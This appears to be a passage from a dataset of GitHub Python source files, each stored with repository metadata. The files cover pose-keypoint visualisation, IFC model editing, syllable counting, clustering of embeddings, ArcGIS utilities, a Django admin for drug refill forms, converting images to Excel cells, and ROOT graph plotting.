skeletonVerticesInv\n\nclass FasterRcnnModel():\n def __init__(self, model):\n self.model = model\n self.skeletonIndices, self.skeletonVerticesInv = get_coco_skeleton()\n print('Faster RCNN Skeleton:')\n from pprint import pprint\n pprint(self.skeletonVerticesInv)\n\n def forward(self, x):\n with torch.no_grad():\n if isinstance(x, np.ndarray):\n x = torch.from_numpy(x).cuda().float().div_(255).unsqueeze_(0).permute(0,3,1,2)\n else:\n assert isinstance(x, torch.Tensor)\n assert x.dtype == torch.float32 or x.dtype == torch.uint8\n if x.dtype == torch.float32:\n x = x.cuda().unsqueeze_(0).permute(0,3,1,2)\n else:\n x = x.cuda().float().div_(255).unsqueeze_(0).permute(0,3,1,2)\n\n x = self.model.weights.transforms()(x)\n return self.model(x)\n\n def __call__(self, x): return self.forward(x)\n\n def show_viz(self, img, boxes, keypointss, kscores, show=True):\n for box in boxes.cpu().numpy():\n pt1 = box[:2].astype(int)\n pt2 = box[2:].astype(int)\n cv2.rectangle(img, pt1,pt2, (0,255,0), 1)\n\n textImg = img*0\n circImg = img*0\n\n for keypoints in keypointss.cpu().numpy():\n for i, kpt in enumerate(keypoints):\n if kpt[2] > .5:\n pt = kpt[:2].astype(int)\n pt1 = kpt[:2].astype(int) + (1,0)\n score = kscores.view(-1)[i].sigmoid().item()\n c = (255-int(score*255),int(score*255),0)\n cv2.circle(circImg, pt, 4, c, 1)\n # print(pt,score)\n cv2.putText(textImg, str(i), pt1, 0, .6, (0,0,0))\n cv2.putText(textImg, str(i), pt, 0, .6, c)\n\n for keypoints in keypointss.cpu().numpy():\n for (a,b) in self.skeletonIndices:\n if keypoints[a,2].item() > .5 and keypoints[b,2].item() > .5:\n pta = keypoints[a,:2].astype(int)\n ptb = keypoints[b,:2].astype(int)\n scorea = kscores.view(-1)[a].sigmoid().item()\n scoreb = kscores.view(-1)[b].sigmoid().item()\n score = scorea * scoreb\n c = (255-int(score*255),int(score*255),0)\n cv2.line(img, pta, ptb, c)\n\n img = cv2.addWeighted(img, 1, textImg, .3, 0)\n img = cv2.addWeighted(img, 1, circImg, .6, 0)\n\n if show:\n cv2.imshow('img', img[...,::-1])\n cv2.waitKey(0)\n return img\n\n\ndef run_model_and_viz(m, img, show=True):\n out = m(img)[0]\n vimg = m.show_viz(img, out['boxes'], out['keypoints'], out['keypoints_scores'], show=show)\n\n # out = run_model(m, img)[0]\n # print(out)\n # show_viz(img, out['boxes'], out['keypoints'], out['keypoints_scores'])\n return out, vimg\n\nif __name__ == '__main__':\n # img = np.copy(cv2.imread('data/me.jpg')[...,[2,1,0]], 'C')\n img = np.copy(cv2.imread('data/me2.jpg')[...,[2,1,0]], 'C')\n img = cv2.resize(img,(0,0),fx=.5,fy=.5)\n\n m = get_resnet50()\n m = FasterRcnnModel(m)\n\n run_model_and_viz(img)\n","repo_name":"steplee/steplee.github.io","sub_path":"extraPages/xray/pysrc/est2d/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"23925407973","text":"import ifcopenshell\nimport ifcopenshell.api\n\n\nclass Usecase:\n def __init__(self, file, product=None):\n \"\"\"Unassigns a product from its aggregate\n\n A product (i.e. a smaller part of a whole) may be aggregated into zero\n or one larger space or element. This function will remove that\n aggregation relationship.\n\n As all physical IFC model elements must be part of a hierarchical tree\n called the \"spatial decomposition\", using this function will remove the\n product from that tree. This is a dangerous operation and may result in\n the product no longer being visible in IFC applications.\n\n If the product is not part of an aggregation relationship, nothing will\n happen.\n\n :param product: The part of the aggregate, typically an IfcElement or\n IfcSpatialStructureElement subclass\n :type product: ifcopenshell.entity_instance.entity_instance\n :return: The IfcRelAggregate relationship instance, only returned if the\n whole still contains any other parts.\n :rtype: ifcopenshell.entity_instance.entity_instance, None\n\n Example:\n\n .. code:: python\n\n element = ifcopenshell.api.run(\"root.create_entity\", model, ifc_class=\"IfcSite\")\n subelement1 = ifcopenshell.api.run(\"root.create_entity\", model, ifc_class=\"IfcBuilding\")\n subelement2 = ifcopenshell.api.run(\"root.create_entity\", model, ifc_class=\"IfcBuilding\")\n ifcopenshell.api.run(\"aggregate.assign_object\", model, product=subelement1, relating_object=element)\n ifcopenshell.api.run(\"aggregate.assign_object\", model, product=subelement2, relating_object=element)\n # The relationship is returned as element still has subelement2\n rel = ifcopenshell.api.run(\"aggregate.unassign_object\", model, product=subelement1)\n # Nothing is returned, as element is now empty\n ifcopenshell.api.run(\"aggregate.unassign_object\", model, product=subelement2)\n \"\"\"\n self.file = file\n self.settings = { \"product\": product }\n\n def execute(self):\n for rel in self.settings[\"product\"].Decomposes or []:\n if not rel.is_a(\"IfcRelAggregates\"):\n continue\n if len(rel.RelatedObjects) == 1:\n return self.file.remove(rel)\n related_objects = list(rel.RelatedObjects)\n related_objects.remove(self.settings[\"product\"])\n rel.RelatedObjects = related_objects\n ifcopenshell.api.run(\"owner.update_owner_history\", self.file, **{\"element\": rel})\n return rel\n","repo_name":"IfcOpenShell/IfcOpenShell","sub_path":"src/ifcopenshell-python/ifcopenshell/api/aggregate/unassign_object.py","file_name":"unassign_object.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"71"}
+{"seq_id":"72392520551","text":"import re, nltk, json\n\n# check for a letter or digit; https://docs.python.org/3/library/re.html\nnonPunct = re.compile('\\w')\n\nfrom nltk.corpus import cmudict\ndic = cmudict.dict()\nfrom collections import Counter\nfrom nltk import sent_tokenize, word_tokenize\n\ndef nsyl(word):\n \"\"\" Function that uses CMU dictionary from NLTK to count syllables in\n a word. If the word is unrecognized, return value will be None.\n\n If alternative pronunciations are found, function returns maximum\n value.\n \"\"\"\n if word in dic:\n pronunciations = dic[word]\n num_syls = [len([syl for syl in pron if re.findall('[0-9]', syl)])\n for pron in pronunciations]\n return max(num_syls)\n\ndef flatten(a_list):\n return [item for sublist in a_list for item in sublist]\n\ndef syllable_data(text):\n\n # Use NLTK to 'tokenize' text into sentences, then into words\n sents = sent_tokenize(text)\n word_tokens = flatten([word_tokenize(s) for s in sents])\n\n # Get words that have letters in them (this excludes pure punctuation\n # tokens like `,\n words = [w for w in word_tokens if nonPunct.match(w)]\n words_7 = [word for word in words if len(word)>=7]\n\n sylls = [nsyl(word.lower()) for word in words]\n syl_dict = {\n 'sent_count': len(sents),\n 'word_count': len(words),\n 'word_7_count': len(words_7),\n 'num_syllables': sum([syll for syll in sylls if syll is not None]),\n 'syllable_counts': \\\n Counter([syll for syll in sylls if syll is not None])}\n return json.dumps(syl_dict)\n\ndef get_long_words(text):\n\n words = [word.lower() for sent in nltk.sent_tokenize(text.decode('utf8'))\n for word in nltk.word_tokenize(sent)]\n\n # Require words to be more than three characters. Otherwise, \"edu\"=\"E-D-U\" => 3 syllables\n words = [word for word in words if nsyl(word)>=3 and len(word)>3]\n return words\n","repo_name":"iangow/streetevents_private","sub_path":"linguistic_features/syllable_count.py","file_name":"syllable_count.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"11369564059","text":"from time import time\n\nfrom sklearn import metrics\nimport torch\nimport numpy as np\n\n\nclass ClusterModel:\n \"\"\"\n Interface for cluster algorithm\n \"\"\"\n\n def __init__(self, model, cluster_helper):\n \"\"\"\n :param model: The clustering model used.\n :param cluster_helper: A ClusterHelper instance\n that avoids recomputing everything\n \"\"\"\n\n self.cluster_helper = cluster_helper\n\n self.model = model\n\n self.mapping = None\n\n def fit(self, train=None):\n \"\"\"\n Fit the cluster algorithm.\n\n :param train: training data\n \"\"\"\n if train is None:\n train = self.cluster_helper.unlabelled_embeddings\n\n self.model.fit(train)\n\n def predict(self, x):\n \"\"\"\n Make a prediction from x\n\n :param x: data to use to predict\n :return: prediction\n \"\"\"\n predictions = self.model.predict(x)\n return predictions\n\n def labelled_predict(self, x):\n \"\"\"\n Make a prediction and label it.\n\n :param x: data to use to predict\n :return: labeled prediction\n \"\"\"\n predictions = self.predict(x)\n return np.array([self.mapping.get(p, -1) for p in predictions])\n\n def create_mapping(self, valid=None, labels=None):\n \"\"\"\n Associate a label with each cluster from the train embeddings\n\n :param valid: split from the validition used for labeling\n :param labels:\n :return:\n \"\"\"\n if valid is None:\n valid = self.cluster_helper.train_embedding\n labels = self.cluster_helper.train_labels\n\n prediction = self.model.predict(valid)\n\n uniques = np.unique(prediction)\n\n self.mapping = dict()\n\n for u in uniques:\n filtered_labels = labels[prediction == u]\n\n if len(filtered_labels) != 0:\n values, counts = np.unique(filtered_labels, return_counts=True)\n self.mapping[u] = values[counts.argmax()]\n\n def full_fit(self, train=None, valid=None, labels=None):\n \"\"\"\n Performs the fit and labels the clusters.\n\n Args:\n train (np.array): Array of training examples.\n valid (np.array): Array of validation examples.\n labels (np.array): Array containing the labels of the validation examples.\n \"\"\"\n\n self.fit(train)\n self.create_mapping(valid, labels)\n\n\nclass ClusterHelper:\n \"\"\"\n Contains pre-computed\n \"\"\"\n\n def __init__(self, model, device, unlabelled_loader, train_loader,\n valid_loader):\n\n self.unlabelled_loader = unlabelled_loader\n self.train_loader = train_loader\n self.valid_loader = valid_loader\n\n self.train_labels = self.get_labels(train_loader)\n self.valid_labels = self.get_labels(valid_loader)\n\n self.unlabelled_embeddings = None\n self.train_embedding = None\n self.valid_embedding = None\n\n self.model = model\n self.device = device\n\n @staticmethod\n def get_labels(dataloader):\n \"\"\"\n Returns the labels from a dataloader as a numpy array.\n\n Args:\n dataloader (torch.utils.data.DataLoader): A labelled dataloader.\n\n Returns:\n labels (np.array): The labels contained in the dataloader.\n \"\"\"\n\n labels = []\n\n for _, label in dataloader:\n labels.append(label)\n\n labels = np.concatenate(labels)\n\n return labels.reshape(-1)\n\n def get_embeddings(self, dataloader):\n \"\"\"\n Returns the latent representation of the dataset loaded by the dataloader,\n as a numpy array.\n\n Args:\n dataloader (torch.utils.data.DataLoader): The dataloader.\n\n Returns:\n embeddings (np.array): The embedding of the dataset.\n \"\"\"\n\n embeddings = []\n\n self.model.eval()\n\n with torch.no_grad():\n for data in dataloader:\n\n if isinstance(data, tuple) or isinstance(data, list):\n data = data[0]\n\n data = data.to(self.device)\n\n z = self.model.encode(data).cpu()\n\n if isinstance(z, tuple) or isinstance(data, list):\n z = z[0]\n\n embeddings.append(z.detach().numpy())\n\n embeddings = np.concatenate(embeddings)\n\n return embeddings\n\n def build_unlabelled_embeddings(self):\n \"\"\"Builds the embedding for the unlabelled dataset\"\"\"\n self.unlabelled_embeddings = self.get_embeddings(\n self.unlabelled_loader)\n\n def build_train_embeddings(self):\n \"\"\"Builds the embedding for the training labelled dataset\"\"\"\n self.train_embedding = self.get_embeddings(self.train_loader)\n\n def build_valid_embeddings(self):\n \"\"\"Builds the embedding for the validation labelled dataset\"\"\"\n self.valid_embedding = self.get_embeddings(self.valid_loader)\n\n def build_embeddings(self):\n \"\"\"Builds all enecessary embeddings\"\"\"\n self.build_unlabelled_embeddings()\n self.build_train_embeddings()\n self.build_valid_embeddings()\n\n\nclass ClusterCollection:\n \"\"\"\n Contains a collection of clustering algorithms,\n along with a ClusterHelper object to avoid repetition.\n \"\"\"\n\n def __init__(self, models, model, device, unlabelled_loader, train_loader,\n valid_loader):\n\n self.cluster_helper = ClusterHelper(\n model,\n device,\n unlabelled_loader,\n train_loader,\n valid_loader\n )\n\n self.models = {\n key: ClusterModel(value, self.cluster_helper)\n for key, value in models.items()\n }\n\n def full_fit(self):\n \"\"\"\n Performs the full fit on every clustering model.\n \"\"\"\n\n self.cluster_helper.build_embeddings()\n\n for model in self.models.values():\n t0 = time()\n print('Fitting Model: {}'.format(model.model), end='... ')\n model.full_fit()\n print('Done. Time elapsed : {:.3f}s.'.format(time() - t0))\n\n def get_clustering_metrics(self):\n \"\"\"\n Gets the clustering metrics for each model.\n\n Returns:\n other_metrics (dict): A dictionary containing the metric for each model.\n \"\"\"\n\n clustering_metrics = {\n 'ARI': metrics.adjusted_rand_score,\n 'mutual_info': metrics.adjusted_mutual_info_score,\n 'homogeneity': metrics.homogeneity_score,\n 'completeness': metrics.completeness_score,\n 'F1': metrics.f1_score,\n 'accuracy': metrics.accuracy_score,\n 'recall': metrics.recall_score\n }\n\n other_metrics = {}\n\n for key, model in self.models.items():\n\n cluster_predict = model.predict(\n self.cluster_helper.valid_embedding)\n label_predict = model.labelled_predict(\n self.cluster_helper.valid_embedding)\n labels = self.cluster_helper.valid_labels\n\n for name, metric in clustering_metrics.items():\n\n if name in {'F1', 'recall'}:\n other_metrics['{}-{}'.format(key, name)] = metric(labels,\n label_predict,\n average='weighted')\n elif name == 'accuracy':\n other_metrics['{}-{}'.format(key, name)] = metric(labels,\n label_predict)\n elif name == 'mutual_info':\n other_metrics['{}-{}'.format(key, name)] = metric(labels,\n cluster_predict,\n average_method='arithmetic')\n else:\n other_metrics['{}-{}'.format(key, name)] = metric(labels,\n cluster_predict)\n\n print('{}-{}: {}'.format(key, name, other_metrics[\n '{}-{}'.format(key, name)]))\n\n return other_metrics\n\n\nclass MajorityVote(object):\n\n def __init__(self, models):\n \"\"\"\n Args:\n models (list of ClusterModels): Pre-trained ClusterModel objects.\n \"\"\"\n\n self.models = models\n\n for model in self.models:\n del model.cluster_helper\n\n def labelled_predict(self, x):\n \"\"\"\n Returns a majority vote for each row of x.\n\n Args:\n x (np.array): Array of embeddings.\n\n Returns:\n prediction (np.array): 1D array of predictions.\n \"\"\"\n\n predictions = np.stack([\n model.labelled_predict(x)\n for model in self.models\n ], axis=1)\n\n def get_vote(row):\n \"\"\"\n Gets the vote from a row of prediction.\n In case of ties, returns a random choice.\n\n Args:\n row (np.array): A row of a numpy array.\n\n Returns:\n vote (int): The majority vote\n \"\"\"\n\n uniques, counts = np.unique(row, return_counts=True)\n\n counts = counts[uniques != -1]\n uniques = uniques[uniques != -1]\n\n if len(counts) == 0:\n return -1\n\n uniques = uniques[counts == counts.max()]\n\n return np.random.choice(uniques)\n\n prediction = np.array([\n get_vote(row)\n for row in predictions\n ])\n\n return prediction\n","repo_name":"josephdviviano/horoma","sub_path":"utils/clusters.py","file_name":"clusters.py","file_ext":"py","file_size_in_byte":9706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"8792675691","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\nMichael D. Troyer\n\nmtroyer@blm.gov\n719-269-8587\n\"\"\"\n\n\nimport csv\nimport os\nimport arcpy\n\n\ndef blast_my_cache():\n \"\"\"\n Delete in memory tables and feature classes\n reset to original workspace when done\n \"\"\"\n\n # get the original workspace location\n orig_workspace = arcpy.env.workspace\n \n # Set the workspace to in_memory\n arcpy.env.workspace = \"in_memory\"\n # Delete all in memory feature classes\n fcs = arcpy.ListFeatureClasses()\n if len(fcs) > 0:\n for fc in fcs:\n arcpy.Delete_management(fc)\n # Delete all in memory tables\n tbls = arcpy.ListTables()\n if len(tbls) > 0:\n for tbl in tbls:\n arcpy.Delete_management(tbl)\n\n # Reset the workspace\n arcpy.env.workspace = orig_workspace\n\n\ndef find_files(folder, ext, prefix=None):\n \"\"\"\n Check the input for files of type and optionally matching\n and return a list of the full file paths of each matching file.\n Inputs:\n :folder: str - full file path to a directory\n :ext: str - extension file type\n :prefix: str - prefix to match\n \"\"\"\n matches = []\n files = os.listdir(folder)\n for f in files:\n if os.path.splitext(f)[1] == ext:\n if prefix:\n if f.startswith(prefix):\n matches.append(os.path.join(folder, f))\n else:\n matches.append(os.path.join(folder, f))\n return matches\n\n\ndef add_fields_from_csv(csv_file, target):\n \"\"\"\n Reads a csv file for feature class or table attribute data and add attribute fields.\n \"\"\"\n with open(csv_file, 'r') as f:\n csv_reader = csv.reader(f)\n headers = next(csv_reader)\n for row in csv_reader:\n attribute_desc = {header: value for header, value in zip(headers, row)}\n arcpy.AddField_management(\n in_table=target,\n field_name=attribute_desc['NAME'],\n field_type=attribute_desc['TYPE'],\n field_precision=attribute_desc['PRECISION'],\n field_scale=attribute_desc['SCALE'],\n field_length=attribute_desc['LENGTH'],\n field_alias=attribute_desc['ALIAS'],\n field_is_nullable=attribute_desc['ISNULLABLE'],\n field_is_required=attribute_desc['REQUIRED'],\n field_domain=attribute_desc['DOMAIN'],\n )","repo_name":"MichaelTroyer/ArcGIS_Build_AGOL_Database","sub_path":"helpers/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"21933075516","text":"import cv2\r\nfrom win32com.client import Dispatch\r\nfrom contextlib import contextmanager\r\nimport time\r\nimport os\r\nimport logging\r\nimport argparse\r\n\r\nMAX_WIDTH = 312\r\nMAX_HEIGHT = 386\r\n\r\n\r\ndef get_image(path, width=100, height=100):\r\n image = cv2.imread(path, cv2.IMREAD_COLOR)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n width = min(MAX_WIDTH, width)\r\n height = min(MAX_HEIGHT, height)\r\n new_image = cv2.resize(image, (width, height))\r\n return new_image\r\n\r\ndef get_image_scale(path, higher_dim=min(MAX_WIDTH, MAX_HEIGHT)):\r\n image = cv2.imread(path, cv2.IMREAD_COLOR)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n dimensions = image.shape\r\n current_height, current_width, _ = dimensions\r\n scale = current_height/current_width\r\n\r\n ratio = current_width/current_height\r\n if scale > 1: # height > width\r\n height = int(higher_dim)\r\n width = int(higher_dim * (current_height/current_width) ** -1)\r\n else:\r\n width = int(higher_dim)\r\n height = int(higher_dim * (current_height/current_width))\r\n new_image = cv2.resize(image, (width, height))\r\n return new_image\r\n\r\n\r\ndef image_toRGBdict(image):\r\n col, row, _ = image.shape\r\n pixels = {}\r\n for c in range(col):\r\n for r in range(row):\r\n pixel = (c, r)\r\n pixels[pixel] = rgb_to_hex(tuple(image[c][r])[::-1])\r\n return pixels\r\n\r\ndef rgb_to_hex(rgb):\r\n strvalue = '%02x%02x%02x' % rgb\r\n ivalue = int(strvalue, 16)\r\n return ivalue\r\n\r\ndef write_to_excel(rgbs: dict, save_as: str, worksheet: str='Sheet1') -> None:\r\n\r\n @contextmanager\r\n def open_excel(path: str):\r\n col_start = 1\r\n col_end = 1000\r\n app = Dispatch('Excel.Application')\r\n app.Visible = False\r\n app.DisplayAlerts = False\r\n workbook = app.Workbooks.Add()\r\n for x in range(col_start, col_end):\r\n workbook.Worksheets['Sheet1'].Columns(x).ColumnWidth = 2\r\n yield workbook\r\n workbook.SaveAs(path)\r\n app.DisplayAlerts = True\r\n app.Quit()\r\n\r\n with open_excel(save_as) as wb:\r\n s = wb.Worksheets(worksheet)\r\n for cell_addr, cell_rgb in rgbs.items():\r\n row, col = cell_addr\r\n row += 1\r\n col += 1\r\n s.Cells(row, col).Interior.Color = cell_rgb\r\n return\r\n\r\n\r\ndef image_to_excel(image_path, save_as, worksheet='Sheet1', do_scaling=True, scale=250, height=100, width=100):\r\n MAX_FORMATS = 65490 # hardcoded limit; see support.microsoft.com/en-us/office/excel-specifications-and-limits-1672b34d-7043-467e-8e27-269d656771c3\r\n if do_scaling:\r\n image = get_image_scale(image_path, higher_dim=scale)\r\n else:\r\n image = get_image(image_path, height=height, width=width)\r\n rgb_dict = image_toRGBdict(image)\r\n if len(set(rgb_dict.values())) > MAX_FORMATS:\r\n raise ValueError(\"Error -- more cell formats than excel will allow (max is {})\".format(MAX_FORMATS))\r\n write_to_excel(rgb_dict, save_as)\r\n\r\n\r\ndef pic_dir_to_excel_dir(pic_dir, excel_dir, do_scaling=True, scale=250, width=100, height=100):\r\n assert os.path.isdir(pic_dir)\r\n assert os.path.isdir(excel_dir)\r\n for file in os.listdir(pic_dir):\r\n print('Processing {}...'.format(file))\r\n try:\r\n file_path = os.path.join(pic_dir, file)\r\n file_name, _ = file.split('.')\r\n save_as = os.path.join(excel_dir, '{}.xlsx'.format(file_name))\r\n image_to_excel(file_path, save_as, do_scaling=do_scaling, scale=scale, height=height, width=width)\r\n except BaseException as e:\r\n print('Error processing file {}. Proceeding to next file'.format(file))\r\n logging.error(e)\r\n\r\n\r\ndef multiprocess(pics, excel_dir=None, do_scaling=True, scale=250, width=None, height=None):\r\n import os\r\n import multiprocessing\r\n\r\n if not excel_dir:\r\n excel_dir = os.getcwd()\r\n\r\n if do_scaling:\r\n assert scale\r\n assert not width\r\n assert not height\r\n else:\r\n assert not scale\r\n assert width\r\n assert height\r\n\r\n jobs = []\r\n if os.path.isdir(pics):\r\n for file in os.listdir(pics):\r\n print('Starting {}...'.format(file))\r\n file_path = os.path.join(pics, file)\r\n file_name, _ = file.split('.')\r\n save_as = os.path.join(excel_dir, '{}.xlsx'.format(file_name))\r\n p = multiprocessing.Process(target=image_to_excel, args=(file_path, save_as, None, do_scaling, scale, height, width))\r\n p.start()\r\n jobs.append(p)\r\n\r\n for job in jobs:\r\n job.join()\r\n\r\n elif os.path.isfile(pics):\r\n file_name, _ = pics.split('.')\r\n save_as = os.path.join(excel_dir, '{}.xlsx'.format(file_name))\r\n p = multiprocessing.Process(target=image_to_excel, args=(pics, save_as, None, do_scaling, scale, height, width))\r\n p.start()\r\n p.join()\r\n\r\n else:\r\n raise ValueError(\"Error -- 'pics' argument (currently '{}') must be either file or directory\".format(pics))\r\n\r\n\r\nif __name__ == '__main__':\r\n pics = r\"C:\\Users\\paul_\\PycharmProjects\\Picxel\\Pictures\"\r\n save_dir = r\"C:\\Users\\paul_\\PycharmProjects\\Picxel\\Workbooks\"\r\n test = r\"C:\\Users\\paul_\\PycharmProjects\\Picxel\\Pictures\\david.jpg\"\r\n\r\n parser = argparse.ArgumentParser(description='Pixelate image(s) to Excel')\r\n parser.add_argument(\"--scale\", default=200, type=int)\r\n parser.add_argument('picture', help='picture file OR directory in which pictures are stored')\r\n parser.add_argument('save', help=\"directory in which completed excel workbooks should be saved\")\r\n args = parser.parse_args()\r\n\r\n assert os.path.isdir(args.save)\r\n\r\n picture = os.path.abspath(args.picture)\r\n save = os.path.abspath(args.save)\r\n scale = args.scale\r\n\r\n import time\r\n start_time = time.time()\r\n multiprocess(picture, save, scale=scale)\r\n end_time = time.time()\r\n runtime = end_time - start_time\r\n print('{} seconds elapsed'.format(runtime))","repo_name":"PaulWendt96/Pixcel","sub_path":"Pixcelize.py","file_name":"Pixcelize.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"3528340308","text":"from django.contrib import admin\nfrom django.utils.safestring import mark_safe\nfrom django_audit_fields.admin import audit_fieldset_tuple\nfrom edc_crf.admin import crf_status_fieldset_tuple\nfrom edc_form_label.form_label_modeladmin_mixin import FormLabelModelAdminMixin\nfrom edc_model_admin import SimpleHistoryAdmin, TabularInlineMixin\n\nfrom inte_subject.forms import DrugSupplyDmForm\n\nfrom ..admin_site import inte_subject_admin\nfrom ..forms import DrugRefillDmForm\nfrom ..models import DrugRefillDm, DrugSupplyDm\nfrom .modeladmin_mixins import CrfModelAdminMixin, DrugSupplyInlineMixin\n\n\nclass DrugSupplyDmInline(DrugSupplyInlineMixin, TabularInlineMixin, admin.TabularInline):\n\n model = DrugSupplyDm\n form = DrugSupplyDmForm\n min_num = 1\n insert_after = \"return_in_days\"\n\n def get_formset(self, request, obj=None, **kwargs):\n formset = super().get_formset(request, obj=None, **kwargs)\n formset.validate_min = True\n return formset\n\n\n@admin.register(DrugRefillDm, site=inte_subject_admin)\nclass DrugRefillDmAdmin(CrfModelAdminMixin, FormLabelModelAdminMixin, SimpleHistoryAdmin):\n form = DrugRefillDmForm\n\n additional_instructions = mark_safe(\n 'Note: Medications CRF must be completed first. '\n )\n\n inlines = [DrugSupplyDmInline]\n\n fieldsets = (\n (None, {\"fields\": (\"subject_visit\", \"report_datetime\")}),\n (\n \"Diabetes Drug Refill Today\",\n {\n \"fields\": (\n \"rx\",\n \"rx_other\",\n \"rx_modified\",\n \"modifications\",\n \"modifications_other\",\n \"modifications_reason\",\n \"modifications_reason_other\",\n \"return_in_days\",\n )\n },\n ),\n crf_status_fieldset_tuple,\n audit_fieldset_tuple,\n )\n filter_horizontal = [\"rx\", \"modifications\", \"modifications_reason\"]\n\n radio_fields = {\n \"crf_status\": admin.VERTICAL,\n \"rx_modified\": admin.VERTICAL,\n }\n","repo_name":"inte-africa-trial/inte-edc","sub_path":"inte_subject/admin/drug_refill_dm_admin.py","file_name":"drug_refill_dm_admin.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"26282313337","text":"#!/usr/bin/env python\n\nimport sys\n\nimport logging\nlogging.basicConfig(level=logging.INFO,\n format='%(levelname)s - %(funcName)s: %(message)s')\n\nimport ROOT as r\nr.PyConfig.IgnoreCommandLineOptions = True\n\nfrom utils.recurse import collectGraphs\nfrom utils.plotHelpers import mkplot, _defaultColors\n\n# global array of rootfiles, to avoid getting them closed on going out of scope\n_open_files = []\n\ndef collect_graphs(inputfiles):\n \"\"\"Collect all the graphs from the input files\"\"\"\n graphs = {}\n global _open_files\n for inf in inputfiles:\n logging.debug('Opening file {}'.format(inf))\n f = r.TFile.Open(inf)\n _open_files.append(f)\n\n graphs[inf] = collectGraphs(f)\n\n logging.debug('Collected {} graphs'.format(len(graphs[inf])))\n\n return graphs\n\n\ndef parse_file_name(filename):\n \"\"\"Get the bin threshold and the number of bins from the filename\"\"\"\n import re\n rgx = r'bin_thresh_([0-9]+).*n_bins_([0-9]+)'\n m = re.search(rgx, filename)\n if m:\n logging.debug('Matching \\'{}\\' to \\'{}\\' worked: {}'.format(rgx, filename, m.groups()))\n return [int(m.group(i)) for i in [1,2]]\n\n logging.warning('Could not match \\'{}\\' to \\'{}\\''.format(rgx, filename))\n return -1,-1\n\n\ndef select_graphs(graphs, sel_str):\n \"\"\"From the graphs of all files select the ones matching\"\"\"\n from utils.miscHelpers import filterDict\n\n logging.debug('Selecting graphs matching \\'{}\\''.format(sel_str))\n sel_graphs = {}\n for inf in graphs:\n sel_cands = filterDict(graphs[inf], sel_str).values()\n logging.debug('Found {} matching graphs in \\'{}\\''.format(len(sel_cands), inf))\n if len(sel_cands) == 0:\n logging.warning('Could not get graphs matching \\'{}\\' '\n 'from file {}'.format(sel_str, inf))\n continue\n if len(sel_cands) > 1:\n # sort by length, since '_scan' is appended to the files\n sel_cands.sort(key=lambda x: len(x.GetName()))\n logging.info('Found {} graphs matching \\'{}\\' '\n 'in file {}, selecting {}'.format(len(sel_cands), sel_str,\n inf, sel_cands[0]))\n logging.debug('Other candidates were {}'.format(sel_cands[1:]))\n\n sel_graphs[inf] = sel_cands[0]\n\n logging.debug('Selected {} graphs for {} files'.format(len(sel_graphs), len(graphs)))\n return sel_graphs\n\n\ndef sort_graphs(graphs):\n \"\"\"Sort the graphs according to the bin threshold and then number of bins\"\"\"\n # first create a list of tuples so that keys and values stick together but\n # are orderable\n from operator import itemgetter\n\n logging.debug('Sorting graphs. Creating sorting list of tuple')\n gtuples = zip((parse_file_name(k) for k in graphs.keys()), graphs.values())\n\n gtuples.sort(key=itemgetter(0,1))\n logging.debug('Done sorting graphs')\n\n return (g[0] for g in gtuples), (g[1] for g in gtuples)\n\n\ndef set_marker_styles(graphs):\n \"\"\"\n Set different marker styles, such that each marker - color\n combination is present only once\n \"\"\"\n n_colors = len(_defaultColors())\n marker_styles = (20, 21, 22, 34, 47, 23, 33)\n\n for i, g in enumerate(graphs):\n i_col = (i + 1) / n_colors\n g.SetMarkerStyle(marker_styles[i_col])\n g.SetMarkerSize(1.5)\n\n\ndef set_line_styles(graphs):\n \"\"\"\n Set different line styles, such that each line - color combination\n is present only once\n \"\"\"\n n_colors = len(_defaultColors())\n line_styles = (1, 2, 8, 6)\n\n for i, g in enumerate(graphs):\n i_col = (i + 1) / n_colors\n g.SetLineStyle(line_styles[i_col])\n g.SetLineWidth(2)\n\n\ndef plot_graphs(graphs, sel_str, plotname, contour, ranges):\n \"\"\"Plot all graphs matching the sel_str\"\"\"\n logging.debug('Creating plot for sel_str = \\'{}\\''.format(sel_str))\n sel_graphs = select_graphs(graphs, sel_str)\n logging.debug('Got {} graphs'.format(len(sel_graphs)))\n\n binnings, graphs = sort_graphs(sel_graphs)\n graphs = list(graphs) # need a list in any case\n\n if not contour:\n set_marker_styles(graphs)\n draw_opt = 'PE'\n else:\n set_line_styles(graphs)\n draw_opt='L'\n\n make_leg = lambda x: 'thresh = {}, bins = {}'.format(x[0], x[1])\n\n mkplot(graphs,\n legEntries=[make_leg(b) for b in binnings],\n xRange=ranges[0], yRange=ranges[1],\n saveAs=plotname, grid=True, drawOpt=draw_opt,\n legPos='botleft', yLabel='#Delta_{#lambda}', xLabel='#lambda_{ref}')\n\n\ndef main(inputfiles, contour, errorbars, outbase, errlevel, axis_ran_str=''):\n \"\"\"Main\"\"\"\n # collect all graphs and then handle them according to args\n logging.info('Collecting graphs from {} files'.format(len(inputfiles)))\n all_graphs = collect_graphs(inputfiles)\n\n err_rgx = r'errlevel_' + errlevel.replace('.', '\\.')\n\n if axis_ran_str:\n logging.debug('Getting axis ranges from {}'.format(axis_ran_str))\n ranges = [float(v) for v in axis_ran_str.split(',')]\n if len(ranges) < 4:\n print('Could not get 4 values from {}'.format(axis_ran_str))\n sys.exit(1)\n\n axis_ranges = []\n axis_ranges.append([ranges[0], ranges[1]])\n axis_ranges.append([ranges[2], ranges[3]])\n logging.debug('Axis ranges are: {} and {}'.format(axis_ranges[0],\n axis_ranges[1]))\n\n else:\n 